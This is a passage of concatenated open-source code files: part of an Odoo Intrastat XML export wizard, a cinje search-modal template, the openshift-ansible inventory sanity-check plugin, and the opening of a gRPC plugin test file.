xmlid_mod = self.pool['ir.model.data']
action_id = xmlid_mod.xmlid_to_res_id(cr, uid, 'base.action_res_company_form')
raise exceptions.RedirectWarning(
translated_msg, action_id, _('Go to company configuration screen'))
def create_xml(self, cr, uid, ids, context=None):
"""Creates xml that is to be exported and sent to estate for partner vat intra.
:return: Value for next action.
:rtype: dict
"""
decl_datas = self.browse(cr, uid, ids[0])
company = decl_datas.tax_code_id.company_id
if not (company.partner_id and company.partner_id.country_id and
company.partner_id.country_id.id):
self._company_warning(
cr, uid,
_('The country of your company is not set, '
'please make sure to configure it first.'),
context=context)
kbo = company.company_registry
if not kbo:
self._company_warning(
cr, uid,
_('The registry number of your company is not set, '
'please make sure to configure it first.'),
context=context)
if len(decl_datas.year) != 4:
raise exceptions.Warning(_('Year must be 4 digits number (YYYY)'))
#Create root declaration
decl = ET.Element('DeclarationReport')
decl.set('xmlns', INTRASTAT_XMLNS)
#Add Administration elements
admin = ET.SubElement(decl, 'Administration')
fromtag = ET.SubElement(admin, 'From')
fromtag.text = kbo
fromtag.set('declarerType', 'KBO')
ET.SubElement(admin, 'To').text = "NBB"
ET.SubElement(admin, 'Domain').text = "SXX"
if decl_datas.arrivals == 'be-standard':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=False, extendedmode=False, context=context))
elif decl_datas.arrivals == 'be-extended':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=False, extendedmode=True, context=context))
if decl_datas.dispatches == 'be-standard':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=True, extendedmode=False, context=context))
elif decl_datas.dispatches == 'be-extended':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=True, extendedmode=True, context=context))
#Get xml string with declaration
data_file = ET.tostring(decl, encoding='UTF-8', method='xml')
#change state of the wizard
self.write(cr, uid, ids,
{'name': 'intrastat_%s%s.xml' % (decl_datas.year, decl_datas.month),
'file_save': base64.encodestring(data_file),
'state': 'download'},
context=context)
return {
'name': _('Save'),
'context': context,
'view_type': 'form',
'view_mode': 'form',
'res_model': 'l10n_be_intrastat_xml.xml_decl',
'type': 'ir.actions.act_window',
'target': 'new',
'res_id': ids[0],
}
def _get_lines(self, cr, uid, ids, decl_datas, company, dispatchmode=False,
extendedmode=False, context=None):
intrastatcode_mod = self.pool['report.intrastat.code']
invoiceline_mod = self.pool['account.invoice.line']
product_mod = self.pool['product.product']
region_mod = self.pool['l10n_be_intrastat.region']
warehouse_mod = self.pool['stock.warehouse']
if dispatchmode:
mode1 = 'out_invoice'
mode2 = 'in_refund'
declcode = "29"
else:
mode1 = 'in_invoice'
mode2 = 'out_refund'
declcode = "19"
decl = ET.Element('Report')
if not extendedmode:
decl.set('code', 'EX%sS' % declcode)
else:
decl.set('code', 'EX%sE' % declcode)
decl.set('date', '%s-%s' % (decl_datas.year, decl_datas.month))
datas = ET.SubElement(decl, 'Data')
if not extendedmode:
datas.set('form', 'EXF%sS' % declcode)
else:
datas.set('form', 'EXF%sE' % declcode)
datas.set('close', 'true')
intrastatkey = namedtuple("intrastatkey",
['EXTRF', 'EXCNT', 'EXTTA', 'EXREG',
'EXGO', 'EXTPC', 'EXDELTRM'])
entries = {}
sqlreq = """
select
inv_line.id
from
account_invoice_line inv_line
join account_invoice inv on inv_line.invoice_id=inv.id
left join res_country on res_country.id = inv.intrastat_country_id
left join res_partner on res_partner.id = inv.partner_id
left join res_country countrypartner on countrypartner.id = res_partner.country_id
join product_product on inv_line.product_id=product_product.id
join product_template on product_product.product_tmpl_id=product_template.id
where
inv.state in ('open','paid')
and inv.company_id=%s
and not product_template.type='service'
and (res_country.intrastat=true or (inv.intrastat_country_id is null
and countrypartner.intrastat=true))
and ((res_country.code is not null and not res_country.code=%s)
or (res_country.code is null and countrypartner.code is not null
and not countrypartner.code=%s))
and inv.type in (%s, %s)
and to_char(inv.date_invoice, 'YYYY')=%s
and to_char(inv.date_invoice, 'MM')=%s
"""
cr.execute(sqlreq, (company.id, company.partner_id.country_id.code,
company.partner_id.country_id.code, mode1, mode2,
decl_datas.year, decl_datas.month))
lines = cr.fetchall()
invoicelines_ids = [rec[0] for rec in lines]
invoicelines = invoiceline_mod.browse(cr, uid, invoicelines_ids, context=context)
for inv_line in invoicelines:
#Check type of transaction
if inv_line.invoice_id.intrastat_transaction_id:
extta = inv_line.invoice_id.intrastat_transaction_id.code
else:
extta = "1"
#Check country
if inv_line.invoice_id.intrastat_country_id:
excnt = inv_line.invoice_id.intrastat_country_id.code
else:
excnt = inv_line.invoice_id.partner_id.country_id.code
#Check region
#If purchase, comes from purchase order, linked to a location,
#which is linked to the warehouse
#if sales, the sale order is linked to the warehouse
#if sales, from a delivery order, linked to a location,
#which is linked to the warehouse
#If none found, get the company one.
exreg = None
if inv_line.invoice_id.type in ('in_invoice', 'in_refund'):
#comes from purchase
POL = self.pool['purchase.order.line']
poline_ids = POL.search(
cr, uid, [('invoice_lines', 'in', inv_line.id)], context=context)
if poline_ids:
purchaseorder = POL.browse(cr, uid, poline_ids[0], context=context).order_id
region_id = warehouse_mod.get_regionid_from_locationid(
cr, uid, purchaseorder.location_id.id, context=context)
if region_id:
exreg = region_mod.browse(cr, uid, region_id).code
elif inv_line.invoice_id.type in ('out_invoice', 'out_refund'):
#comes from sales
soline_ids = self.pool['sale.order.line'].search(
cr, uid, [('invoice_lines', 'in', inv_line.id)], context=context)
if soline_ids:
saleorder = self.pool['sale.order.line'].browse(
cr, uid, soline_ids[0], context=context).order_id
if saleorder and saleorder.warehouse_id and saleorder.warehouse_id.region_id:
exreg = region_mod.browse(
cr, uid, saleorder.warehouse_id.region_id.id, context=context).code
if not exreg:
if company.region_id:
exreg = company.region_id.code
else:
self._company_warning(
cr, uid,
_('The Intrastat Region of the selected company is not set, '
'please make sure to configure it first.'),
context=context)
#Check commodity codes
intrastat_id = product_mod.get_intrastat_recursively(
cr, uid, inv_line.product_id.id, context=context)
if intrastat_id:
exgo = intrastatcode_mod.browse(cr, uid, intrastat_id, context=context).name
else:
raise exceptions.Warning(
_('Product "%s" has no intrastat code, please configure it') %
inv_line.product_id.display_name)
#In extended mode, 2 more fields required
if extendedmode:
#Check means of transport
if inv_line.invoice_id.transport_mode_id:
extpc = inv_line.invoice_id.transport_mode_id.code
elif company.transport_mode_id:
extpc = company.transport_mode_id.code
else:
self._company_warning(
cr, uid,
_('The default Intrastat transport mode of your company '
'is not set, please make sure to configure it first.'),
context=context)
#Check incoterm
if inv_line.invoice_id.incoterm_id:
exdeltrm = inv_line.invoice_id.incoterm_id.code
elif company.incoterm_id:
exdeltrm = company.incoterm_id.code
else:
self._company_warning(
cr, uid,
_('The default Incoterm of your company is not set, '
'please make sure to configure it first.'),
context=context)
else:
extpc = ""
exdeltrm = ""
linekey = intrastatkey(EXTRF=declcode, EXCNT=excnt,
EXTTA=extta, EXREG=exreg, EXGO=exgo,
EXTPC=extpc, EXDELTRM=exdeltrm)
#We have the key
#calculate amounts
if inv_line.price_unit and inv_line.quantity:
amount = inv_line.price_unit * inv_line.quantity
else:
amount = 0
if (not inv_line.uos_id.category_id
or not inv_line.product_id.uom_id.category_id
or inv_line.uos_id.category_id.id != inv_line.product_id.uom_id.category_id.id):
weight = inv_line.product_id.weight_net * inv_line.quantity
else:
weight = (inv_line.product_id.weight_net *
inv_line.quantity * inv_line.uos_id.factor)
if (not inv_line.uos_id.category_id or not inv_line.product_id.uom_id.category_id
or inv_line.uos_id.category_id.id != inv_line.product_id.uom_id.category_id.id):
supply_units = inv_line.quantity
else:
supply_units = inv_line.quantity * inv_line.uos_id.factor
amounts = entries.setdefault(linekey, (0, 0, 0))
amounts = (amounts[0] + amount, amounts[1] + weight, amounts[2] + supply_units)
entries[linekey] = amounts
numlgn = 0
for linekey in entries:
numlgn += 1
amounts = entries[linekey]
item = ET.SubElement(datas, 'Item')
self._set_Dim(item, 'EXSEQCODE', unicode(numlgn))
self._set_Dim(item, 'EXTRF', unicode(linekey.EXTRF))
self._set_Dim(item, 'EXCNT', unicode(linekey.EXCNT))
self._set_Dim(item, 'EXTTA', unicode(linekey.EXTTA))
self._set_Dim(item, 'EXREG', unicode(linekey.EXREG))
self._set_Dim(item, 'EXTGO', unicode(linekey.EXGO))
if extendedmode:
self._set_Dim(item, 'EXTPC', unicode(linekey.EXTPC))
self._set_Dim(item, 'EXDELTRM', unicode(linekey.EXDELTRM))
self._set_Dim(item, 'EXTXVAL', unicode(round(amounts[0], 0)).replace(".", ","))
self._set_Dim(item, 'EXWEIGHT', unicode(round(amounts[1], 0)).replace(".", ","))
self._set_Dim(item, 'EXUNITS', unicode(round(amounts[2], 0)).replace(".", ","))
if numlgn == 0:
#no datas
datas.set('action', 'nihil')
return decl
def _set_Dim(self, item, prop, value):
dim = ET.SubElement(item, 'Dim')
dim.set('prop', prop)
dim.text = value
| agpl-3.0 |
bmillham/djrq2 | web/app/djrq/templates/searchwindow.py | 1 | 1200 | # encoding: cinje
: def searchwindow ctx
<div id="searchModal" class="modal fade" role="dialog">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal">×</button>
<h4 class="modal-title"> Advanced Search</h4>
</div>
<div class="modal-body">
<p>You may use SQL % and _ wildcards</p>
<img id='ricon' style='display:none' src='/public/icons/catgif8.gif'>
<form id='searchform' action='/search' class='ajax' method='post' data-append='#main-content' role='search'>
<div class='form-group'>
<label for='advsearchtype'>Search For</label>
<select class="form-control" id="advsearchtype" name="advsearchtype">
<option>Artist</option>
<option>Album</option>
<option>Title</option>
</select>
</div>
<input type="search" class="form-control" id="advsearchtext" name="advsearchtext" placeholder="Search">
<button type="submit" class="btn btn-primary">Search</button>
<button type="button" class="btn btn-danger" data-dismiss="modal">Close</button>
</form>
</div>
</div>
</div>
</div>
: end
| mit |
tagliateller/openshift-ansible | roles/lib_utils/action_plugins/sanity_checks.py | 4 | 25951 | """
Ansible action plugin to ensure inventory variables are set
appropriately and no conflicting options have been provided.
"""
import fnmatch
import json
import re
from ansible.plugins.action import ActionBase
from ansible import errors
# pylint: disable=import-error,no-name-in-module
from ansible.module_utils.six.moves.urllib.parse import urlparse
# Valid values for openshift_deployment_type
VALID_DEPLOYMENT_TYPES = ('origin', 'openshift-enterprise')
# Tuple of variable names and default values if undefined.
NET_PLUGIN_LIST = (('openshift_use_openshift_sdn', True),
('openshift_use_flannel', False),
('openshift_use_nuage', False),
('openshift_use_contiv', False),
('openshift_use_calico', False),
('openshift_use_kuryr', False),
('openshift_use_nsx', False))
ENTERPRISE_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#[.#[.#]]. Examples: v1.2, v3.4.1, v3.5.1.3,
v3.5.1.3.4, v1.2-1, v1.2.3-4, v1.2.3-4.5, v1.2.3-4.5.6
You specified openshift_image_tag={}"""
ORIGIN_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#[.#-optional.#]. Examples: v1.2.3, v3.5.1-alpha.1
You specified openshift_image_tag={}"""
ORIGIN_TAG_REGEX = {'re': '(^v?\\d+\\.\\d+.*)',
'error_msg': ORIGIN_TAG_REGEX_ERROR}
ENTERPRISE_TAG_REGEX = {'re': '(^v\\d+\\.\\d+(\\.\\d+)*(-\\d+(\\.\\d+)*)?$)',
'error_msg': ENTERPRISE_TAG_REGEX_ERROR}
IMAGE_TAG_REGEX = {'origin': ORIGIN_TAG_REGEX,
'openshift-enterprise': ENTERPRISE_TAG_REGEX}
PKG_VERSION_REGEX_ERROR = """openshift_pkg_version must be in the format
-[optional.release]. Examples: -3.6.0, -3.7.0-0.126.0.git.0.9351aae.el7 -3.11*
You specified openshift_pkg_version={}"""
PKG_VERSION_REGEX = {'re': '(^-.*)',
'error_msg': PKG_VERSION_REGEX_ERROR}
RELEASE_REGEX_ERROR = """openshift_release must be in the format
v#[.#[.#]]. Examples: v3.9, v3.10.0
You specified openshift_release={}"""
RELEASE_REGEX = {'re': '(^v?\\d+(\\.\\d+(\\.\\d+)?)?$)',
'error_msg': RELEASE_REGEX_ERROR}
STORAGE_KIND_TUPLE = (
'openshift_loggingops_storage_kind',
'openshift_logging_storage_kind',
'openshift_metrics_storage_kind')
IMAGE_POLICY_CONFIG_VAR = "openshift_master_image_policy_config"
ALLOWED_REGISTRIES_VAR = "openshift_master_image_policy_allowed_registries_for_import"
REMOVED_VARIABLES = (
('openshift_hostname', 'Removed: See documentation'),
# TODO(michaelgugino): Remove in 3.12
('oreg_auth_credentials_replace', 'Removed: Credentials are now always updated'),
('oreg_url_master', 'oreg_url'),
('oreg_url_node', 'oreg_url'),
('openshift_cockpit_deployer_prefix', 'openshift_cockpit_deployer_image'),
('openshift_cockpit_deployer_basename', 'openshift_cockpit_deployer_image'),
('openshift_cockpit_deployer_version', 'openshift_cockpit_deployer_image'),
('openshift_hosted_logging_elasticsearch_pvc_prefix', 'openshift_logging_es_pvc_prefix'),
('logging_ops_hostname', 'openshift_logging_kibana_ops_hostname'),
('openshift_hosted_logging_ops_hostname', 'openshift_logging_kibana_ops_hostname'),
('openshift_hosted_logging_elasticsearch_cluster_size', 'logging_elasticsearch_cluster_size'),
('openshift_hosted_logging_elasticsearch_ops_cluster_size', 'logging_elasticsearch_ops_cluster_size'),
('openshift_hosted_logging_storage_kind', 'openshift_logging_storage_kind'),
('openshift_hosted_logging_storage_host', 'openshift_logging_storage_host'),
('openshift_hosted_logging_storage_labels', 'openshift_logging_storage_labels'),
('openshift_hosted_logging_storage_volume_size', 'openshift_logging_storage_volume_size'),
('openshift_hosted_loggingops_storage_kind', 'openshift_loggingops_storage_kind'),
('openshift_hosted_loggingops_storage_host', 'openshift_loggingops_storage_host'),
('openshift_hosted_loggingops_storage_labels', 'openshift_loggingops_storage_labels'),
('openshift_hosted_loggingops_storage_volume_size', 'openshift_loggingops_storage_volume_size'),
('openshift_hosted_logging_enable_ops_cluster', 'openshift_logging_use_ops'),
('openshift_hosted_logging_image_pull_secret', 'openshift_logging_image_pull_secret'),
('openshift_hosted_logging_hostname', 'openshift_logging_kibana_hostname'),
('openshift_hosted_logging_kibana_nodeselector', 'openshift_logging_kibana_nodeselector'),
('openshift_hosted_logging_kibana_ops_nodeselector', 'openshift_logging_kibana_ops_nodeselector'),
('openshift_hosted_logging_journal_source', 'openshift_logging_fluentd_journal_source'),
('openshift_hosted_logging_journal_read_from_head', 'openshift_logging_fluentd_journal_read_from_head'),
('openshift_hosted_logging_fluentd_nodeselector_label', 'openshift_logging_fluentd_nodeselector'),
('openshift_hosted_logging_elasticsearch_instance_ram', 'openshift_logging_es_memory_limit'),
('openshift_hosted_logging_elasticsearch_nodeselector', 'openshift_logging_es_nodeselector'),
('openshift_hosted_logging_elasticsearch_ops_nodeselector', 'openshift_logging_es_ops_nodeselector'),
('openshift_hosted_logging_elasticsearch_ops_instance_ram', 'openshift_logging_es_ops_memory_limit'),
('openshift_hosted_logging_storage_access_modes', 'openshift_logging_storage_access_modes'),
('openshift_hosted_logging_master_public_url', 'openshift_logging_master_public_url'),
('openshift_hosted_logging_deployer_prefix', 'openshift_logging_image_prefix'),
('openshift_hosted_logging_deployer_version', 'openshift_logging_image_version'),
('openshift_hosted_logging_deploy', 'openshift_logging_install_logging'),
('openshift_hosted_logging_curator_nodeselector', 'openshift_logging_curator_nodeselector'),
('openshift_hosted_logging_curator_ops_nodeselector', 'openshift_logging_curator_ops_nodeselector'),
('openshift_hosted_metrics_storage_access_modes', 'openshift_metrics_storage_access_modes'),
('openshift_hosted_metrics_storage_host', 'openshift_metrics_storage_host'),
('openshift_hosted_metrics_storage_nfs_directory', 'openshift_metrics_storage_nfs_directory'),
('openshift_hosted_metrics_storage_volume_name', 'openshift_metrics_storage_volume_name'),
('openshift_hosted_metrics_storage_volume_size', 'openshift_metrics_storage_volume_size'),
('openshift_hosted_metrics_storage_labels', 'openshift_metrics_storage_labels'),
('openshift_hosted_metrics_deployer_prefix', 'openshift_metrics_image_prefix'),
('openshift_hosted_metrics_deployer_version', 'openshift_metrics_image_version'),
('openshift_hosted_metrics_deploy', 'openshift_metrics_install_metrics'),
('openshift_hosted_metrics_storage_kind', 'openshift_metrics_storage_kind'),
('openshift_hosted_metrics_public_url', 'openshift_metrics_hawkular_hostname'),
('openshift_node_labels', 'openshift_node_groups[<item>].labels'),
('openshift_node_kubelet_args', 'openshift_node_groups[<item>].edits'),
)
# JSON_FORMAT_VARIABLES does not intende to cover all json variables, but
# complicated json variables in hosts.example are covered.
JSON_FORMAT_VARIABLES = (
'openshift_builddefaults_json',
'openshift_buildoverrides_json',
'openshift_master_admission_plugin_config',
'openshift_master_audit_config',
'openshift_crio_docker_gc_node_selector',
'openshift_master_image_policy_allowed_registries_for_import',
'openshift_master_image_policy_config',
'openshift_master_oauth_templates',
'container_runtime_extra_storage',
'openshift_additional_repos',
'openshift_master_identity_providers',
'openshift_master_htpasswd_users',
'openshift_additional_projects',
'openshift_hosted_routers',
'openshift_node_open_ports',
'openshift_master_open_ports',
)
def to_bool(var_to_check):
"""Determine a boolean value given the multiple
ways bools can be specified in ansible."""
# http://yaml.org/type/bool.html
yes_list = (True, 1, "True", "1", "true", "TRUE",
"Yes", "yes", "Y", "y", "YES",
"on", "ON", "On")
return var_to_check in yes_list
def check_for_removed_vars(hostvars, host):
"""Fails if removed variables are found"""
found_removed = []
for item in REMOVED_VARIABLES:
if item in hostvars[host]:
found_removed.append(item)
if found_removed:
msg = "Found removed variables: "
for item in found_removed:
msg += "{} is replaced by {}; ".format(item[0], item[1])
raise errors.AnsibleModuleError(msg)
return None
class ActionModule(ActionBase):
"""Action plugin to execute sanity checks."""
def template_var(self, hostvars, host, varname):
"""Retrieve a variable from hostvars and template it.
If undefined, return None type."""
# We will set the current host and variable checked for easy debugging
# if there are any unhandled exceptions.
# pylint: disable=W0201
self.last_checked_var = varname
# pylint: disable=W0201
self.last_checked_host = host
res = hostvars[host].get(varname)
if res is None:
return None
return self._templar.template(res)
def check_openshift_deployment_type(self, hostvars, host):
"""Ensure a valid openshift_deployment_type is set"""
openshift_deployment_type = self.template_var(hostvars, host,
'openshift_deployment_type')
if openshift_deployment_type not in VALID_DEPLOYMENT_TYPES:
type_strings = ", ".join(VALID_DEPLOYMENT_TYPES)
msg = "openshift_deployment_type must be defined and one of {}".format(type_strings)
raise errors.AnsibleModuleError(msg)
return openshift_deployment_type
def get_allowed_registries(self, hostvars, host):
"""Returns a list of configured allowedRegistriesForImport as a list of patterns"""
allowed_registries_for_import = self.template_var(hostvars, host, ALLOWED_REGISTRIES_VAR)
if allowed_registries_for_import is None:
image_policy_config = self.template_var(hostvars, host, IMAGE_POLICY_CONFIG_VAR)
if not image_policy_config:
return image_policy_config
if isinstance(image_policy_config, str):
try:
image_policy_config = json.loads(image_policy_config)
except Exception:
raise errors.AnsibleModuleError(
"{} is not a valid json string".format(IMAGE_POLICY_CONFIG_VAR))
if not isinstance(image_policy_config, dict):
raise errors.AnsibleModuleError(
"expected dictionary for {}, not {}".format(
IMAGE_POLICY_CONFIG_VAR, type(image_policy_config)))
detailed = image_policy_config.get("allowedRegistriesForImport", None)
if not detailed:
return detailed
if not isinstance(detailed, list):
raise errors.AnsibleModuleError("expected list for {}['{}'], not {}".format(
IMAGE_POLICY_CONFIG_VAR, "allowedRegistriesForImport",
type(allowed_registries_for_import)))
try:
return [i["domainName"] for i in detailed]
except Exception:
raise errors.AnsibleModuleError(
"each item of allowedRegistriesForImport must be a dictionary with 'domainName' key")
if not isinstance(allowed_registries_for_import, list):
raise errors.AnsibleModuleError("expected list for {}, not {}".format(
IMAGE_POLICY_CONFIG_VAR, type(allowed_registries_for_import)))
return allowed_registries_for_import
def check_whitelisted_registries(self, hostvars, host):
"""Ensure defined registries are whitelisted"""
allowed = self.get_allowed_registries(hostvars, host)
if allowed is None:
return
unmatched_registries = []
for regvar in (
"oreg_url"
"openshift_cockpit_deployer_prefix",
"openshift_metrics_image_prefix",
"openshift_logging_image_prefix",
"openshift_service_catalog_image_prefix",
"openshift_docker_insecure_registries"):
value = self.template_var(hostvars, host, regvar)
if not value:
continue
if isinstance(value, list):
registries = value
else:
registries = [value]
for reg in registries:
if not any(is_registry_match(reg, pat) for pat in allowed):
unmatched_registries.append((regvar, reg))
if unmatched_registries:
registry_list = ", ".join(["{}:{}".format(n, v) for n, v in unmatched_registries])
raise errors.AnsibleModuleError(
"registry hostnames of the following image prefixes are not whitelisted by image"
" policy configuration: {}".format(registry_list))
def check_python_version(self, hostvars, host, distro):
"""Ensure python version is 3 for Fedora and python 2 for others"""
ansible_python = self.template_var(hostvars, host, 'ansible_python')
if distro == "Fedora":
if ansible_python['version']['major'] != 3:
msg = "openshift-ansible requires Python 3 for {};".format(distro)
msg += " For information on enabling Python 3 with Ansible,"
msg += " see https://docs.ansible.com/ansible/python_3_support.html"
raise errors.AnsibleModuleError(msg)
else:
if ansible_python['version']['major'] != 2:
msg = "openshift-ansible requires Python 2 for {};".format(distro)
def check_image_tag_format(self, hostvars, host, openshift_deployment_type):
"""Ensure openshift_image_tag is formatted correctly"""
openshift_image_tag = self.template_var(hostvars, host, 'openshift_image_tag')
if not openshift_image_tag or openshift_image_tag == 'latest':
return None
regex_to_match = IMAGE_TAG_REGEX[openshift_deployment_type]['re']
res = re.match(regex_to_match, str(openshift_image_tag))
if res is None:
msg = IMAGE_TAG_REGEX[openshift_deployment_type]['error_msg']
msg = msg.format(str(openshift_image_tag))
raise errors.AnsibleModuleError(msg)
def check_pkg_version_format(self, hostvars, host):
"""Ensure openshift_pkg_version is formatted correctly"""
openshift_pkg_version = self.template_var(hostvars, host, 'openshift_pkg_version')
if not openshift_pkg_version:
return None
regex_to_match = PKG_VERSION_REGEX['re']
res = re.match(regex_to_match, str(openshift_pkg_version))
if res is None:
msg = PKG_VERSION_REGEX['error_msg']
msg = msg.format(str(openshift_pkg_version))
raise errors.AnsibleModuleError(msg)
def check_release_format(self, hostvars, host):
"""Ensure openshift_release is formatted correctly"""
openshift_release = self.template_var(hostvars, host, 'openshift_release')
if not openshift_release:
return None
regex_to_match = RELEASE_REGEX['re']
res = re.match(regex_to_match, str(openshift_release))
if res is None:
msg = RELEASE_REGEX['error_msg']
msg = msg.format(str(openshift_release))
raise errors.AnsibleModuleError(msg)
def network_plugin_check(self, hostvars, host):
"""Ensure only one type of network plugin is enabled"""
res = []
# Loop through each possible network plugin boolean, determine the
# actual boolean value, and append results into a list.
for plugin, default_val in NET_PLUGIN_LIST:
res_temp = self.template_var(hostvars, host, plugin)
if res_temp is None:
res_temp = default_val
res.append(to_bool(res_temp))
if sum(res) not in (0, 1):
plugin_str = list(zip([x[0] for x in NET_PLUGIN_LIST], res))
msg = "Host Checked: {} Only one of must be true. Found: {}".format(host, plugin_str)
raise errors.AnsibleModuleError(msg)
def check_hostname_vars(self, hostvars, host):
"""Checks to ensure openshift_kubelet_name_override
and openshift_public_hostname
conform to the proper length of 63 characters or less"""
for varname in ('openshift_public_hostname', 'openshift_kubelet_name_override'):
var_value = self.template_var(hostvars, host, varname)
if var_value and len(var_value) > 63:
msg = '{} must be 63 characters or less'.format(varname)
raise errors.AnsibleModuleError(msg)
def check_session_auth_secrets(self, hostvars, host):
"""Checks session_auth_secrets is correctly formatted"""
sas = self.template_var(hostvars, host,
'openshift_master_session_auth_secrets')
ses = self.template_var(hostvars, host,
'openshift_master_session_encryption_secrets')
# This variable isn't mandatory, only check if set.
if sas is None and ses is None:
return None
if not (
issubclass(type(sas), list) and issubclass(type(ses), list)
) or len(sas) != len(ses):
raise errors.AnsibleModuleError(
'Expects openshift_master_session_auth_secrets and '
'openshift_master_session_encryption_secrets are equal length lists')
for secret in sas:
if len(secret) < 32:
raise errors.AnsibleModuleError(
'Invalid secret in openshift_master_session_auth_secrets. '
'Secrets must be at least 32 characters in length.')
for secret in ses:
if len(secret) not in [16, 24, 32]:
raise errors.AnsibleModuleError(
'Invalid secret in openshift_master_session_encryption_secrets. '
'Secrets must be 16, 24, or 32 characters in length.')
return None
def check_unsupported_nfs_configs(self, hostvars, host):
"""Fails if nfs storage is in use for any components. This check is
ignored if openshift_enable_unsupported_configurations=True"""
enable_unsupported = self.template_var(
hostvars, host, 'openshift_enable_unsupported_configurations')
if to_bool(enable_unsupported):
return None
for storage in STORAGE_KIND_TUPLE:
kind = self.template_var(hostvars, host, storage)
if kind == 'nfs':
raise errors.AnsibleModuleError(
'nfs is an unsupported type for {}. '
'openshift_enable_unsupported_configurations=True must '
'be specified to continue with this configuration.'
''.format(storage))
return None
def check_htpasswd_provider(self, hostvars, host):
"""Fails if openshift_master_identity_providers contains an entry of
kind HTPasswdPasswordIdentityProvider and
openshift_master_manage_htpasswd is False"""
manage_pass = self.template_var(
hostvars, host, 'openshift_master_manage_htpasswd')
if to_bool(manage_pass):
# If we manage the file, we can just generate in the new path.
return None
idps = self.template_var(
hostvars, host, 'openshift_master_identity_providers')
if not idps:
# If we don't find any identity_providers, nothing for us to do.
return None
old_keys = ('file', 'fileName', 'file_name', 'filename')
if not isinstance(idps, list):
raise errors.AnsibleModuleError("| not a list")
for idp in idps:
if idp['kind'] == 'HTPasswdPasswordIdentityProvider':
for old_key in old_keys:
if old_key in idp is not None:
raise errors.AnsibleModuleError(
'openshift_master_identity_providers contains a '
'provider of kind==HTPasswdPasswordIdentityProvider '
'and {} is set. Please migrate your htpasswd '
'files to /etc/origin/master/htpasswd and update your '
'existing master configs, and remove the {} key'
'before proceeding.'.format(old_key, old_key))
def validate_json_format_vars(self, hostvars, host):
"""Fails if invalid json format are found"""
found_invalid_json = []
for var in JSON_FORMAT_VARIABLES:
if var in hostvars[host]:
json_var = self.template_var(hostvars, host, var)
try:
json.loads(json_var)
except ValueError as json_err:
found_invalid_json.append([var, json_var, json_err])
except BaseException:
pass
if found_invalid_json:
msg = "Found invalid json format variables:\n"
for item in found_invalid_json:
msg += " {} specified in {} is invalid json format\n {}".format(item[1], item[0], item[2])
raise errors.AnsibleModuleError(msg)
return None
def check_for_oreg_password(self, hostvars, host, odt):
"""Ensure oreg_password is defined when using registry.redhat.io"""
reg_to_check = 'registry.redhat.io'
err_msg = ("oreg_auth_user and oreg_auth_password must be provided when "
"deploying openshift-enterprise")
err_msg2 = ("oreg_auth_user and oreg_auth_password must be provided when using "
"{}".format(reg_to_check))
oreg_password = self.template_var(hostvars, host, 'oreg_auth_password')
if oreg_password is not None:
# A password is defined, so we're good to go.
return None
oreg_url = self.template_var(hostvars, host, 'oreg_url')
if oreg_url is not None:
if reg_to_check in oreg_url:
raise errors.AnsibleModuleError(err_msg2)
elif odt == 'openshift-enterprise':
# We're not using an oreg_url, we're using default enterprise
# registry. We require oreg_auth_user and oreg_auth_password
raise errors.AnsibleModuleError(err_msg)
def run_checks(self, hostvars, host):
"""Execute the hostvars validations against host"""
distro = self.template_var(hostvars, host, 'ansible_distribution')
odt = self.check_openshift_deployment_type(hostvars, host)
self.check_whitelisted_registries(hostvars, host)
self.check_python_version(hostvars, host, distro)
self.check_image_tag_format(hostvars, host, odt)
self.check_pkg_version_format(hostvars, host)
self.check_release_format(hostvars, host)
self.network_plugin_check(hostvars, host)
self.check_hostname_vars(hostvars, host)
self.check_session_auth_secrets(hostvars, host)
self.check_unsupported_nfs_configs(hostvars, host)
self.check_htpasswd_provider(hostvars, host)
check_for_removed_vars(hostvars, host)
self.validate_json_format_vars(hostvars, host)
self.check_for_oreg_password(hostvars, host, odt)
def run(self, tmp=None, task_vars=None):
result = super(ActionModule, self).run(tmp, task_vars)
# self.task_vars holds all in-scope variables.
# Ignore settting self.task_vars outside of init.
# pylint: disable=W0201
self.task_vars = task_vars or {}
# pylint: disable=W0201
self.last_checked_host = "none"
# pylint: disable=W0201
self.last_checked_var = "none"
# self._task.args holds task parameters.
# check_hosts is a parameter to this plugin, and should provide
# a list of hosts.
check_hosts = self._task.args.get('check_hosts')
if not check_hosts:
msg = "check_hosts is required"
raise errors.AnsibleModuleError(msg)
# We need to access each host's variables
hostvars = self.task_vars.get('hostvars')
if not hostvars:
msg = hostvars
raise errors.AnsibleModuleError(msg)
# We loop through each host in the provided list check_hosts
for host in check_hosts:
try:
self.run_checks(hostvars, host)
except Exception as uncaught_e:
msg = "last_checked_host: {}, last_checked_var: {};"
msg = msg.format(self.last_checked_host, self.last_checked_var)
msg += str(uncaught_e)
raise errors.AnsibleModuleError(msg)
result["changed"] = False
result["failed"] = False
result["msg"] = "Sanity Checks passed"
return result
def is_registry_match(item, pattern):
"""returns True if the registry matches the given whitelist pattern
Unlike in OpenShift, the comparison is done solely on hostname part
(excluding the port part) since the latter is much more difficult due to
vague definition of port defaulting based on insecure flag. Moreover, most
of the registries will be listed without the port and insecure flag.
"""
item = "schema://" + item.split('://', 1)[-1]
pat = pattern.rsplit(':', 1)[0]
name = urlparse(item).hostname
return fnmatch.fnmatch(name, pat)
| apache-2.0 |
kpayson64/grpc | src/python/grpcio_tests/tests/protoc_plugin/_python_plugin_test.py | 13 | 20483 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import contextlib
import distutils.spawn
import errno
import os
import shutil
import subprocess
import sys
import tempfile
import threading
import unittest
from six import moves
import grpc
from tests.unit import test_common
from tests.unit.framework.common import test_constants
import tests.protoc_plugin.protos.payload.test_payload_pb2 as payload_pb2
